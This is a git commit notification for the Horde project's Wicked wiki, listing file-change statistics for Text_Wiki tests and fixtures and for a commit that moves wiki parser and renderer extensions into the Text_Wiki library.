 wicked/lib/Text_Wiki/packageTiki.xml               |  178 +++
 wicked/lib/Text_Wiki/tests/AllTests.php            |   41 +
 wicked/lib/Text_Wiki/tests/BBCode/7908.phpt        |  243 +++
 wicked/lib/Text_Wiki/tests/Cowiki_Render_Url.phpt  |   18 +
 wicked/lib/Text_Wiki/tests/Creole_Parse_Url.phpt   |   70 +
 wicked/lib/Text_Wiki/tests/Creole_Render_Url.phpt  |   18 +
 .../Text_Wiki/tests/Default_Parse_BlockQuote.phpt  |   72 +
 wicked/lib/Text_Wiki/tests/Docbook_Render_Url.phpt |   14 +
 wicked/lib/Text_Wiki/tests/Doku_Render_Url.phpt    |   18 +
 wicked/lib/Text_Wiki/tests/Latex_Render_Url.phpt   |   20 +
 wicked/lib/Text_Wiki/tests/Plain_Render_Url.phpt   |   15 +
 wicked/lib/Text_Wiki/tests/Text_Wiki_BugTests.php  |   56 +
 .../tests/Text_Wiki_Generic_Transform_Tests.php    |   36 +
 .../tests/Text_Wiki_Parse_Mediawiki_Tests.php      |  765 ++++++++++
 .../Text_Wiki/tests/Text_Wiki_Parse_Tiki_Tests.php |  127 ++
 .../lib/Text_Wiki/tests/Text_Wiki_Render_Tests.php |   98 ++
 .../tests/Text_Wiki_Render_Tiki_Tests.php          |  728 +++++++++
 wicked/lib/Text_Wiki/tests/Text_Wiki_Tests.php     |  505 +++++++
 wicked/lib/Text_Wiki/tests/Xhtml_Render_Url.phpt   |   15 +
 wicked/lib/Text_Wiki/tests/fixtures/bug11649.txt   |  521 +++++++
 .../Text_Wiki/tests/fixtures/mediawiki_syntax.txt  |  123 ++
 .../mediawiki_syntax_to_test_preformatted.txt      |   10 +
 .../fixtures/mediawiki_syntax_to_test_raw.txt      |    9 +
 .../fixtures/mediawiki_syntax_to_test_wikilink.txt |   88 ++
 .../test_mediawiki_to_tiki_lists_output.txt        |   17 +
 .../test_mediawiki_to_tiki_lists_source.txt        |   18 +
 .../fixtures/test_mediawiki_to_tiki_output.txt     |   52 +
 .../test_mediawiki_to_tiki_redirect_output.txt     |    3 +
 .../test_mediawiki_to_tiki_redirect_source.txt     |    2 +
 .../fixtures/test_mediawiki_to_tiki_source.txt     |   58 +
 .../test_mediawiki_wikilink_expected_matches.php   |   70 +
 .../test_tiki_heading_expected_matches.php         |   60 +
 .../fixtures/test_tiki_to_tiki_heading_source.txt  |   11 +
 .../fixtures/text_wiki_sample_mediawiki_syntax.txt |   66 +
 ...ext_wiki_sample_syntax_transformed_to_plain.txt |   64 +
 ...xt_wiki_sample_syntax_transformed_to_plain2.txt |   64 +
 ...ext_wiki_sample_syntax_transformed_to_xhtml.txt |   70 +
 .../lib/Text_Wiki/tests/fixtures/tiki_syntax.txt   |   23 +
 621 files changed, 47292 insertions(+)

http://github.com/horde/horde/commit/68ece8f7d7bfae48bb360912a9943ca4cf41d2d6

-----------------------------------------------------------------------

commit d6e5e531c18748c30ecd959c8d3e700102754635
Author: Jan Schneider 
Date:   Mon Sep 4 17:59:17 2017 +0200

    Re-merge Horde customizations and extensions.

 .../Text_Wiki/Text/Wiki/Parse/BBCode/Attribute.php |  52 +++++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Code2.php |  10 +
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Image2.php    |  10 +
 .../Text/Wiki/Parse/BBCode/Registrylink.php        |  44 +++++
 .../Text/Wiki/Parse/BBCode/Wickedblock.php         |  45 +++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Attribute.php |  52 +++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Code2.php |  10 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Freelink2.php |  10 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Heading2.php  |  15 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Image2.php    |  10 +
 .../Text/Wiki/Parse/Cowiki/Registrylink.php        |  44 +++++
 .../Text/Wiki/Parse/Cowiki/Wickedblock.php         |  45 +++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink2.php |  10 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Attribute.php |  52 +++++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Heading2.php  |  12 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Image2.php    |  10 +
 .../Text/Wiki/Parse/Creole/Registrylink.php        |  44 +++++
 .../Text/Wiki/Parse/Creole/Wickedblock.php         |  45 +++++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Wikilink2.php |  10 +
 .../Text/Wiki/Parse/Default/Attribute.php          |  52 +++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Code2.php    |  13 ++
 .../Text/Wiki/Parse/Default/Freelink2.php          |  60 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Heading2.php |  16 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Image2.php   |  10 +
 .../Text/Wiki/Parse/Default/Registrylink.php       |  44 +++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Table2.php   | 212 +++++++++++++++++++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Toc2.php |  86 +++++++++
 .../Text/Wiki/Parse/Default/Wickedblock.php        |  45 +++++
 .../Text/Wiki/Parse/Default/Wikilink2.php          |  10 +
 .../Text/Wiki/Parse/Mediawiki/Attribute.php        |  52 +++++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Code2.php  |  10 +
 .../Text/Wiki/Parse/Mediawiki/Heading2.php         |  12 ++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Image2.php |  10 +
 .../Text/Wiki/Parse/Mediawiki/Registrylink.php     |  44 +++++
 .../Text/Wiki/Parse/Mediawiki/Wickedblock.php      |  45 +++++
 .../Text/Wiki/Parse/Mediawiki/Wikilink2.php        |  63 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Attribute.php   |  52 +++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Code2.php   |  10 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Freelink2.php   |  10 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Heading2.php    |  12 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Image2.php  |  10 +
 .../Text/Wiki/Parse/Tiki/Registrylink.php          |  44 +++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wickedblock.php |  45 +++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink2.php   |  10 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Heading2.php  |   7 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Toc2.php  |   7 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Heading2.php  |   7 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Table2.php    |  26 +++
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Toc2.php  |   7 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst.php      |  39 ++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Anchor.php  |  26 +++
 .../Text_Wiki/Text/Wiki/Render/Rst/Blockquote.php  |  70 +++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Bold.php |  44 +++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Center.php  |  26 +++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Code.php |  43 +++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Colortext.php   |  26 +++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Deflist.php |  87 +++++++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Emphasis.php    |  44 +++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Freelink2.php   |  26 +++
 .../Text_Wiki/Text/Wiki/Render/Rst/Heading2.php    | 101 ++++++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Horiz.php   |  39 ++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Interwiki.php   |  66 +++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Italic.php  |  27 +++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Links.php   |  49 +++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/List.php |  71 +++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Newline.php |  43 +++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Paragraph.php   |  51 +++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Phplookup.php   |  58 ++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Raw.php  |  43 +++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Revise.php  |  46 +++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Strong.php  |  26 +++
 .../Text_Wiki/Text/Wiki/Render/Rst/Subscript.php   |  26 +++
 .../Text_Wiki/Text/Wiki/Render/Rst/Superscript.php |  26 +++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Table2.php  | 157 +++++++++++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Toc2.php |  57 ++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Tt.php   |  43 +++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Underline.php   |  26 +++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Url.php  |  53 ++++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Wikilink.php    | 127 ++++++++++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Attribute.php |  53 ++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Code2.php |  28 +++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Freelink2.php |   5 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Heading2.php  |   7 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Image2.php    | 157 +++++++++++++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Interwiki.php | 115 ++++-------
 .../Text/Wiki/Render/Xhtml/Registrylink.php        |  29 +++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Toc2.php  |  92 +++++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Url.php   | 138 +++-----------
 .../Text/Wiki/Render/Xhtml/Wickedblock.php         |  33 ++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Wikilink2.php | 110 +++++++++++
 .../Parse/BBCode/Attribute.php                     |  52 -----
 .../Text_Wiki_Extensions/Parse/BBCode/Code2.php    |  10 -
 .../Text_Wiki_Extensions/Parse/BBCode/Image2.php   |  10 -
 .../Parse/BBCode/Registrylink.php                  |  44 -----
 .../Parse/BBCode/Wickedblock.php                   |  45 -----
 .../Parse/Cowiki/Attribute.php                     |  52 -----
 .../Text_Wiki_Extensions/Parse/Cowiki/Code2.php    |  10 -
 .../Parse/Cowiki/Freelink2.php                     |  10 -
 .../Text_Wiki_Extensions/Parse/Cowiki/Heading2.php |  15 --
 .../Text_Wiki_Extensions/Parse/Cowiki/Image2.php   |  10 -
 .../Parse/Cowiki/Registrylink.php                  |  44 -----
 .../Parse/Cowiki/Wickedblock.php                   |  45 -----
 .../Parse/Cowiki/Wikilink2.php                     |  10 -
 .../Parse/Creole/Attribute.php                     |  52 -----
 .../Text_Wiki_Extensions/Parse/Creole/Heading2.php |  12 --
 .../Text_Wiki_Extensions/Parse/Creole/Image2.php   |  10 -
 .../Parse/Creole/Registrylink.php                  |  44 -----
 .../Parse/Creole/Wickedblock.php                   |  45 -----
 .../Parse/Creole/Wikilink2.php                     |  10 -
 .../Parse/Default/Attribute.php                    |  52 -----
 .../Text_Wiki_Extensions/Parse/Default/Code2.php   |  13 --
 .../Parse/Default/Freelink2.php                    |  60 ------
 .../Parse/Default/Heading2.php                     |  16 --
 .../Text_Wiki_Extensions/Parse/Default/Image2.php  |  10 -
 .../Parse/Default/Registrylink.php                 |  44 -----
 .../Text_Wiki_Extensions/Parse/Default/Table2.php  | 212 ---------------------
 .../Text_Wiki_Extensions/Parse/Default/Toc2.php    |  86 ---------
 .../Parse/Default/Wickedblock.php                  |  45 -----
 .../Parse/Default/Wikilink2.php                    |  10 -
 .../Parse/Mediawiki/Attribute.php                  |  52 -----
 .../Text_Wiki_Extensions/Parse/Mediawiki/Code2.php |  10 -
 .../Parse/Mediawiki/Heading2.php                   |  12 --
 .../Parse/Mediawiki/Image2.php                     |  10 -
 .../Parse/Mediawiki/Registrylink.php               |  44 -----
 .../Parse/Mediawiki/Wickedblock.php                |  45 -----
 .../Parse/Mediawiki/Wikilink2.php                  |  63 ------
 .../Text_Wiki_Extensions/Parse/Tiki/Attribute.php  |  52 -----
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php  |  10 -
 .../Text_Wiki_Extensions/Parse/Tiki/Freelink2.php  |  10 -
 .../Text_Wiki_Extensions/Parse/Tiki/Heading2.php   |  12 --
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php |  10 -
 .../Parse/Tiki/Registrylink.php                    |  44 -----
 .../Parse/Tiki/Wickedblock.php                     |  45 -----
 .../Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php  |  10 -
 .../Text_Wiki_Extensions/Render/Latex/Heading2.php |   7 -
 .../lib/Text_Wiki_Extensions/Render/Latex/Toc2.php |   7 -
 .../Text_Wiki_Extensions/Render/Plain/Heading2.php |   7 -
 .../Text_Wiki_Extensions/Render/Plain/Table2.php   |  26 ---
 .../lib/Text_Wiki_Extensions/Render/Plain/Toc2.php |   7 -
 wicked/lib/Text_Wiki_Extensions/Render/Rst.php     |  39 ----
 .../lib/Text_Wiki_Extensions/Render/Rst/Anchor.php |  26 ---
 .../Text_Wiki_Extensions/Render/Rst/Blockquote.php |  70 -------
 .../lib/Text_Wiki_Extensions/Render/Rst/Bold.php   |  44 -----
 .../lib/Text_Wiki_Extensions/Render/Rst/Center.php |  26 ---
 .../lib/Text_Wiki_Extensions/Render/Rst/Code.php   |  43 -----
 .../Text_Wiki_Extensions/Render/Rst/Colortext.php  |  26 ---
 .../Text_Wiki_Extensions/Render/Rst/Deflist.php    |  87 ---------
 .../Text_Wiki_Extensions/Render/Rst/Emphasis.php   |  44 -----
 .../Text_Wiki_Extensions/Render/Rst/Freelink2.php  |  26 ---
 .../Text_Wiki_Extensions/Render/Rst/Heading2.php   | 101 ----------
 .../lib/Text_Wiki_Extensions/Render/Rst/Horiz.php  |  39 ----
 .../Text_Wiki_Extensions/Render/Rst/Interwiki.php  |  66 -------
 .../lib/Text_Wiki_Extensions/Render/Rst/Italic.php |  27 ---
 .../lib/Text_Wiki_Extensions/Render/Rst/Links.php  |  49 -----
 .../lib/Text_Wiki_Extensions/Render/Rst/List.php   |  71 -------
 .../Text_Wiki_Extensions/Render/Rst/Newline.php    |  43 -----
 .../Text_Wiki_Extensions/Render/Rst/Paragraph.php  |  51 -----
 .../Text_Wiki_Extensions/Render/Rst/Phplookup.php  |  58 ------
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php |  43 -----
 .../lib/Text_Wiki_Extensions/Render/Rst/Revise.php |  46 -----
 .../lib/Text_Wiki_Extensions/Render/Rst/Strong.php |  26 ---
 .../Text_Wiki_Extensions/Render/Rst/Subscript.php  |  26 ---
 .../Render/Rst/Superscript.php                     |  26 ---
 .../lib/Text_Wiki_Extensions/Render/Rst/Table2.php | 157 ---------------
 .../lib/Text_Wiki_Extensions/Render/Rst/Toc2.php   |  57 ------
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php  |  43 -----
 .../Text_Wiki_Extensions/Render/Rst/Underline.php  |  26 ---
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php |  53 ------
 .../Text_Wiki_Extensions/Render/Rst/Wikilink.php   | 127 ------------
 .../Render/Xhtml/Attribute.php                     |  53 ------
 .../Text_Wiki_Extensions/Render/Xhtml/Code2.php    |  28 ---
 .../Render/Xhtml/Freelink2.php                     |   5 -
 .../Text_Wiki_Extensions/Render/Xhtml/Heading2.php |   7 -
 .../Text_Wiki_Extensions/Render/Xhtml/Image2.php   | 157 ---------------
 .../Render/Xhtml/Interwiki.php                     |  56 ------
 .../Render/Xhtml/Registrylink.php                  |  29 ---
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php |  92 ---------
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Url.php  |  47 -----
 .../Render/Xhtml/Wickedblock.php                   |  33 ----
 .../Render/Xhtml/Wikilink2.php                     | 110 -----------
 180 files changed, 3702 insertions(+), 3936 deletions(-)
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Table2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Table2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Anchor.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Blockquote.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Bold.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Center.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Code.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Colortext.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Deflist.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Emphasis.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Horiz.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Interwiki.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Italic.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Links.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/List.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Newline.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Paragraph.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Phplookup.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Raw.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Revise.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Strong.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Subscript.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Superscript.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Table2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Tt.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Underline.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Url.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Wikilink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Table2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Table2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Anchor.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Blockquote.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Bold.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Center.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Code.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Colortext.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Deflist.php
